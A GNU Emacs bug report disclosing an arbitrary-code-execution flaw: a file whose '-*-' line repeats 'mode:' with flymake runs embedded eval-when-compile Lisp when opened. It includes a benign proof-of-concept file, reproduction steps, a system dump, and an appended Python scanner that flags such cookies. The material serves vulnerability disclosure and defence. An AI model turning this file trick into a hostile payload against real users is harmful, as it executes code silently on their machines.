bug-gnu-emacs

bug#37656: 27.0.50; Opening file with specially crafted local variables


From: adam plaice
Subject: bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution
Date: Tue, 8 Oct 2019 10:48:32 +0200

* To reproduce:

1. Create a file, say `~/foobar' (it could have an arbitrary
extension), with the following contents:

-*- mode: emacs-lisp; mode: flymake -*-

(eval-when-compile
  (with-temp-file "~/emacs_flymake_security_bug"
      (insert "Could have also executed any code.")))

2. Open the file with emacs:

emacs -Q ~/foobar

3. Inspect ~/emacs_flymake_security_bug:

cat ~/emacs_flymake_security_bug

* Expected result

~/emacs_flymake_security_bug does not exist.

* Actual result

~/emacs_flymake_security_bug does exist.

* Further information

This relies on the "deprecated" feature of allowing `mode: ' to be
repeated more than once, to also specify minor modes.  Just having:

-*- mode: flymake -*-

in, say, `~/foobar.el' would not trigger the security bug.  There may,
however, be alternative ways of triggering it that I haven't come up
with.


This was "inspired" by a very similar bug (concerning an external
package, editorconfig), described here:

https://illikainen.dev/blog/2019-10-06-editorconfig

Thank you and best regards,
Adam


In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9)
 of 2019-10-07 built on adam
Repository revision: 9839466b231b6384055b9b137405730876413cbe
Repository branch: master
Windowing system distributor 'The X.Org Foundation', version 11.0.11804000
System Description: Ubuntu 16.04.6 LTS

Recent messages:
For information about GNU Emacs and the GNU system, type C-h C-a.

Configured using:
 'configure --with-modules --without-pop'

Configured features:
XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY
ACL LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB
TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP

Important settings:
  value of $LANG: en_GB.UTF-8
  locale-coding-system: utf-8-unix

Major mode: Lisp Interaction

Minor modes in effect:
  tooltip-mode: t
  global-eldoc-mode: t
  eldoc-mode: t
  electric-indent-mode: t
  mouse-wheel-mode: t
  tool-bar-mode: t
  menu-bar-mode: t
  file-name-shadow-mode: t
  global-font-lock-mode: t
  font-lock-mode: t
  blink-cursor-mode: t
  auto-composition-mode: t
  auto-encryption-mode: t
  auto-compression-mode: t
  line-number-mode: t
  transient-mark-mode: t

Load-path shadows:
None found.

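A pre-open check for the file form described in the report above, as an added example that is not part of the original message or of Emacs: it flags files whose `-*-` line repeats `mode:`. The function names and the constructed samples are assumptions, as is looking only at the first line (or the second after a `#!` line).

```python
import re
import sys

# The "-*- ... -*-" cookie form used in the report's reproduction file.
COOKIE_RE = re.compile(r"-\*-(.*?)-\*-")

# First sample is the cookie from the report; the others are constructed.
SAMPLES = {
    "report": "-*- mode: emacs-lisp; mode: flymake -*-\n",
    "single": "-*- mode: flymake -*-\n",
    "shebang": "#!/bin/sh\n# -*- mode: sh; mode: flymake -*-\n",
}


def cookie_modes(text):
    """Return the value of every `mode:` entry in the leading cookie."""
    lines = text.splitlines()[:2]
    # Assumption: the cookie is on line 1, or on line 2 after a "#!" line.
    if lines and lines[0].startswith("#!"):
        lines = lines[1:]
    match = COOKIE_RE.search(lines[0]) if lines else None
    if not match:
        return []
    modes = []
    for entry in match.group(1).split(";"):
        key, sep, value = entry.partition(":")
        if sep and key.strip().lower() == "mode":
            modes.append(value.strip().lower())
    return modes


def audit(text):
    """Return a finding if `mode:` is repeated in the cookie, else None."""
    modes = cookie_modes(text)
    if len(modes) < 2:
        return None  # a single `mode:` is not the form the report relies on
    return {"modes": modes, "flymake": "flymake" in modes}


if __name__ == "__main__":
    # Scan the files named on the command line, or the samples if none given.
    if sys.argv[1:]:
        inputs = {}
        for path in sys.argv[1:]:
            with open(path, errors="replace") as handle:
                inputs[path] = handle.read(4096)
    else:
        inputs = SAMPLES
    for name, text in inputs.items():
        print(name, audit(text) or "ok")
```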




